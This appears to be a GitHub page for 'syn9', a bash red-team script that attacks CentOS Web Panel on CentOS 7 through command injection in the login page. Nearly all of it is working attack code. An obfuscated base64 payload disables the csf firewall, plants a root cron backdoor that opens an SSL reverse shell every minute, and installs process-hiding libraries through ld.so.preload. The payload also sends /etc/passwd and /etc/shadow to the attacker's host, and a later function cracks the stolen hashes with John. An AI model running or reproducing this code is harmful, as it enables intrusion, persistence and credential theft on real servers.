-
Notifications
You must be signed in to change notification settings - Fork 0
/
syn9
executable file
·132 lines (130 loc) · 11.3 KB
/
syn9
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
#!/bin/bash
#----------
RED="\e[95m"
GREEN="\e[32m"
YELLOW="\e[33m"
BLUE="\e[36m"
ENDCOLOR="\e[0m"
#---------- 107 52
: '
(n) syn9
- open reverse shell connection
- intitiate shells tty prompt
- writing backdoor on cron services
'``
#----------
opt_help() { ## display command usage
echo -e "Usage: syn9 [OPTION]... [ARG]..."
echo -e "Red Team utilities for setting up CWP CentOS 7 payload & reverse shell\n"
echo -e "Available flag options, starred one are combination purposes ...\n"
echo -e " ${GREEN}-h${ENDCOLOR}\t launch command usage for avilable flag options & examples"
echo -e " ${GREEN}-g${ENDCOLOR}\t generate a payload string with predefined POST body to be used externally"
echo -e " ${GREEN}-i${ENDCOLOR}\t inject the payload string via curl's POST request internally instead"
echo -e " ${GREEN}-n ${YELLOW}**${ENDCOLOR}\t specify the IP address via the issued network interface"
echo -e " ${GREEN}-o ${YELLOW}**${ENDCOLOR}\t specify the listener port address"
echo -e " ${GREEN}-c ${YELLOW}**${ENDCOLOR}\t specify the SSL certificate path with .PEM format file"
echo -e " ${GREEN}-w ${YELLOW}**${ENDCOLOR}\t specify the CWP site's IP address along with its port number"
echo -e " ${GREEN}-d ${YELLOW}**${ENDCOLOR}\t specify other network interface to be used as decoy on HTTP request"
echo -e " ${GREEN}-e ${YELLOW}**${ENDCOLOR}\t specify wordlist to be used for John to match the password hash from API"
echo -e "\nFlag usage examples:\n"
echo -e " ${YELLOW}$ ${ENDCOLOR}bash syn9 ${GREEN}-o${ENDCOLOR} 6666 ${GREEN}-c${ENDCOLOR} openssl-cert/bind.pem ${GREEN}-n${ENDCOLOR} enp0s8 ${BLUE}## to create a listener${ENDCOLOR}"
echo -e " ${YELLOW}$ ${ENDCOLOR}bash syn9 ${GREEN}-w${ENDCOLOR} 128.0.0.100:2031 ${GREEN}-o${ENDCOLOR} 6666 ${GREEN}-n${ENDCOLOR} enp0s8 ${GREEN}-g${ENDCOLOR} ${BLUE}## to generate the payload string${ENDCOLOR}"
echo -e " ${YELLOW}$ ${ENDCOLOR}bash syn9 ${GREEN}-w${ENDCOLOR} 128.0.0.100:2031 ${GREEN}-o${ENDCOLOR} 6666 ${GREEN}-n${ENDCOLOR} enp0s8 ${GREEN}-i${ENDCOLOR} ${BLUE}## to inject the payload via curl${ENDCOLOR}"
echo -e " ${YELLOW}$ ${ENDCOLOR}bash syn9 ${GREEN}-w${ENDCOLOR} 128.0.0.100:2031 ${GREEN}-o${ENDCOLOR} 6666 ${GREEN}-n${ENDCOLOR} enp0s8 ${GREEN}-i${ENDCOLOR} ${GREEN}-d${ENDCOLOR} eth1"
echo -e " ${YELLOW}$ ${ENDCOLOR}bash syn9 ${GREEN}-e${ENDCOLOR} /usr/share/wordlists/rockyou.txt ${GREEN}-n${ENDCOLOR} enp0s8 ${BLUE}## wordlist for cracking password${ENDCOLOR}"
exit 0
}
#----------
opt_openlistener() {
ip=$(ifconfig $3 | grep "inet " | grep -vw inet6 | tr -s '\t' ' ' | cut -d ' ' -f 3)
echo -e "${RED}[-]${ENDCOLOR} SSL listen : ${BLUE}$ip${ENDCOLOR}:${BLUE}$1${ENDCOLOR} ..."
echo -e "${RED}[-]${ENDCOLOR} SSL cert : ${BLUE}$2${ENDCOLOR},verify=0 ..."
echo -e "${RED}[-]${ENDCOLOR} socat opts. : file:\`tty\`,raw,echo=0 ..."
echo -e "---"
echo -e "${RED}[-]${ENDCOLOR} suggesting static terminal size, rows [${BLUE}20${ENDCOLOR}/${BLUE}42${ENDCOLOR}] x cols [${BLUE}92${ENDCOLOR}/${BLUE}184${ENDCOLOR}] ..."
echo -e "${RED}[-]${ENDCOLOR} ${GREEN}$ ${ENDCOLOR}${YELLOW}stty rows X cols X ${ENDCOLOR}"
echo -e "${RED}[-]${ENDCOLOR} ${GREEN}$ ${ENDCOLOR}${YELLOW}export TERM=xterm-256color${ENDCOLOR}"
echo -e "---"
curl -s -q --data "{\"PORT_LISTENER\":\"$1\",\"IP_LISTENER\":\"$ip\"}" -X PATCH http://$ip:2080/ -o /dev/null
socat file:`tty`,raw,echo=0 openssl-listen:$1,cert=$2,verify=0
exit 0
}
#----------
opt_sendpayload() {
## w = 192.168.1.14, o = 6666, n = eth0
## curl -k -X POST 'https://192.168.1.14:2031/login/index.php?login=$(pwd)' -d 'username=root&password=pwned&commit=Login'
ip=$(ifconfig $3 | grep "inet " | grep -vw inet6 | tr -s '\t' ' ' | cut -d ' ' -f 3)
echo -e "${RED}[-]${ENDCOLOR} URI address : ${BLUE}POST${ENDCOLOR} https://${BLUE}$(echo $1 | cut -d ':' -f 1)${ENDCOLOR}:${BLUE}$(echo $1 | cut -d ':' -f 2)${ENDCOLOR}/login/index.php?login=\$(${BLUE}\$payload${ENDCOLOR}) ..."
echo -e "${RED}[-]${ENDCOLOR} SSL connect : ${BLUE}$ip${ENDCOLOR}:${BLUE}$2${ENDCOLOR} ..."
echo -e "${RED}[-]${ENDCOLOR} POST data : username=${BLUE}root${ENDCOLOR}&password=${BLUE}pwned${ENDCOLOR}&commit=${BLUE}login${ENDCOLOR} ..."
echo -e "${RED}[-]${ENDCOLOR} socat opts. : exec:'bash -li',pty,stderr,setsid,sigint,sane ..."
echo -e "---"
if [[ $4 -eq 1 ]]; then
echo -e "${RED}[-]${ENDCOLOR} generating payload in ${BLUE}base64${ENDCOLOR} format ..."
passwd=$(cat /etc/passwd | grep home | base64 | tr -d '\n')
arr_pwd=$(cat /etc/passwd | grep home | cut -d ':' -f 1)
shadow=$(cat /etc/shadow | grep "$arr_pwd" | base64 | tr -d '\n')
getbase64=$(echo -e "#!/bin/bash\n\$(which cat) /dev/null > /etc/csf/csf.deny\n\$(which csf) -x & wait\n\$(which systemctl) stop csf.service & wait\npathenv=\$(printenv PATH)\nevent=\"DISPLAY=:0\nPATH=\"\$pathenv\"\n*/1 * * * * ip=\\\$(curl -s http://$ip:2080/ | cut -d '\\\"' -f 4); port=\\\$(curl -s http://$ip:2080/ | cut -d '\\\"' -f 12); \$(which socat) exec:'bash -li',pty,stderr,setsid,sigint,sane OPENSSL:\\\$ip:\\\$port,verify=0\"\ncrontab -u root -l | grep /usr/local/cwp/php71/bin/php | crontab -u root -\n(crontab -l; printf \"\$event\\\n\") | crontab -\nwget -q http://$ip/libprocesshider-sh.so -O /tmp/libsh.so & wait\nwget -q http://$ip/libprocesshider-socat.so -O /tmp/libsocat.so & wait\nmv /tmp/libsh.so /tmp/libsocat.so /usr/local/lib/\necho /usr/local/lib/libsh.so >> /etc/ld.so.preload\necho /usr/local/lib/libsocat.so >> /etc/ld.so.preload\npasswd=\$(cat /etc/passwd | grep -E 'home|root' | base64 | tr -d '\\\n')\narr_pwd=\$(cat /etc/passwd | grep -E 'home|root' | cut -d ':' -f 1)\nshadow=\$(cat /etc/shadow | grep \"\$arr_pwd\" | base64 | tr -d '\\\n')\ncurl -s -q --data {\\\"DATA\\\":{\\\"PASSWD\\\":\\\"\$passwd\\\"}} -X PATCH http://$ip:2080/ -o /dev/null\ncurl -s -q --data {\\\"DATA\\\":{\\\"SHADOW\\\":\\\"\$shadow\\\"}} -X PATCH http://$ip:2080/ -o /dev/null\n\$(which socat) exec:'bash -li',pty,stderr,setsid,sigint,sane OPENSSL:$ip:$2,verify=0" | base64 | tr -d '\n')
var="\$(echo\${IFS}$getbase64\${IFS}|\${IFS}base64\${IFS}-d\${IFS}|\${IFS}bash)"
echo -e "---"
echo -e "$var"
else
ps=$(ps axjf | grep "openssl-listen:$2" | grep "socat file:" | grep -v "color" | tr -s ' ' '@' | cut -d'@' -f 3)
echo -e "${RED}[-]${ENDCOLOR} injecting payload to the ${BLUE}URI${ENDCOLOR} via curl ..."
echo -e "${RED}[-]${ENDCOLOR} halting ${BLUE}tty${ENDCOLOR} for the remote access session ($ps)...\n---"
passwd=$(cat /etc/passwd | grep home | base64 | tr -d '\n')
arr_pwd=$(cat /etc/passwd | grep home | cut -d ':' -f 1)
shadow=$(cat /etc/shadow | grep "$arr_pwd" | base64 | tr -d '\n')
getbase64=$(echo -e "#!/bin/bash\n\$(which cat) /dev/null > /etc/csf/csf.deny\n\$(which csf) -x & wait\n\$(which systemctl) stop csf.service & wait\npathenv=\$(printenv PATH)\nevent=\"DISPLAY=:0\nPATH=\"\$pathenv\"\n*/1 * * * * ip=\\\$(curl -s http://$ip:2080/ | cut -d '\\\"' -f 4); port=\\\$(curl -s http://$ip:2080/ | cut -d '\\\"' -f 12); \$(which socat) exec:'bash -li',pty,stderr,setsid,sigint,sane OPENSSL:\\\$ip:\\\$port,verify=0\"\ncrontab -u root -l | grep /usr/local/cwp/php71/bin/php | crontab -u root -\n(crontab -l; printf \"\$event\\\n\") | crontab -\nwget -q http://$ip/libprocesshider-sh.so -O /tmp/libsh.so & wait\nwget -q http://$ip/libprocesshider-socat.so -O /tmp/libsocat.so & wait\nmv /tmp/libsh.so /tmp/libsocat.so /usr/local/lib/\necho /usr/local/lib/libsh.so >> /etc/ld.so.preload\necho /usr/local/lib/libsocat.so >> /etc/ld.so.preload\npasswd=\$(cat /etc/passwd | grep -E 'home|root' | base64 | tr -d '\\\n')\narr_pwd=\$(cat /etc/passwd | grep -E 'home|root' | cut -d ':' -f 1)\nshadow=\$(cat /etc/shadow | grep \"\$arr_pwd\" | base64 | tr -d '\\\n')\ncurl -s -q --data {\\\"DATA\\\":{\\\"PASSWD\\\":\\\"\$passwd\\\"}} -X PATCH http://$ip:2080/ -o /dev/null\ncurl -s -q --data {\\\"DATA\\\":{\\\"SHADOW\\\":\\\"\$shadow\\\"}} -X PATCH http://$ip:2080/ -o /dev/null\n\$(which socat) exec:'bash -li',pty,stderr,setsid,sigint,sane OPENSSL:$ip:$2,verify=0" | base64 | tr -d '\n')
var="\$(echo\${IFS}$getbase64\${IFS}|\${IFS}base64\${IFS}-d\${IFS}|\${IFS}bash)"
intf=$3
if [[ $5 ]]; then intf=$5; fi
curl -k -g -X POST 'https://'$1'/login/index.php?login=$('$var')' -d 'username=root&password=pwned&commit=Login' --interface $intf --max-time 5 -s & wait
curl -s -q --data "{\"IP_TARGET\":\"$1\"}" -X PATCH http://$ip:2080/ -o /dev/null & wait
fi
exit 0
}
#----------
opt_extractpasswd() {
ip=$(ifconfig $2 | grep "inet " | grep -vw inet6 | tr -s '\t' ' ' | cut -d ' ' -f 3)
curl http://$ip:2080 -s | jq .[0].DATA.PASSWD | cut -d '"' -f 2 | base64 -d > /tmp/pwd & wait
curl http://$ip:2080 -s | jq .[0].DATA.SHADOW | cut -d '"' -f 2 | base64 -d > /tmp/sdw & wait
unshadow /tmp/pwd /tmp/sdw > /tmp/usdw & wait
users=$(curl -s http://172.16.1.100:2080 | jq .[0].DATA.PASSWD | cut -d '"' -f 2 | base64 -d | cut -d ':' -f 1 | tr -s '\n' ' ')
echo -e "${RED}[-]${ENDCOLOR} listing all fetched users: ${BLUE}$users${ENDCOLOR}..."
echo -e "${RED}[-]${ENDCOLOR} starting john with ${BLUE}$1${ENDCOLOR} ..."
john --fork=4 --wordlist="$1" /tmp/usdw &> /dev/null
touch log/$(date +'%D' | tr -s '/' '-').log
ip_target=$(curl $ip:2080 -s | jq .[0].IP_TARGET | cut -d '"' -f 2)
echo "$(date +'%T %p') -- $ip_target" >> log/$(date +'%D' | tr -s '/' '-').log
john --show /tmp/usdw | head -n -2 >> log/$(date +'%D' | tr -s '/' '-').log
echo "" >> log/$(date +'%D' | tr -s '/' '-').log
succ_users=$(john --show /tmp/usdw | tail -n 1 | cut -d ' ' -f 1)
echo -e "${RED}[-]${ENDCOLOR} found ${BLUE}$succ_users${ENDCOLOR} of ${BLUE}$(cat /tmp/usdw | wc -l)${ENDCOLOR} user's password ..."
echo -e "${RED}[-]${ENDCOLOR} saving result in ${BLUE}log/$(date +'%D' | tr -s '/' '-').log${ENDCOLOR} ..."
exit 0
}
#==========
get_python=$(readlink -f $(whereis python) | grep bin | grep -wv config | sort -r | head -1)
payloadact="null"
while getopts ":c:o:w:n:d:e: :b :h :g :i" opt; do
case $opt in
w) w="${OPTARG}" ;;
n) n="${OPTARG}" ;;
c) c="${OPTARG}" ;;
o) o="${OPTARG}" ;;
d) d="${OPTARG}" ;;
i) payloadact=0 ;;
g) payloadact=1 ;;
h) opt_help ;;
e) e="${OPTARG}" ;;
*) h="go"
esac
done
#----------
if [[ "$o" && "$c" && "$n" ]]; then opt_openlistener "$o" "$c" "$n"; exit 0; fi
if [[ "$w" && "$o" && "$n" && "$payloadact" != "null" ]]; then opt_sendpayload "$w" "$o" "$n" "$payloadact" "$d"; exit 0; fi
if [[ "$g" && "$w" ]]; then opt_get "$g" "$t" "$w" "$d"; exit 0; fi
if [[ "$e" && "$n" ]]; then opt_extractpasswd "$e" "$n"; exit 0; fi
opt_help
exit 0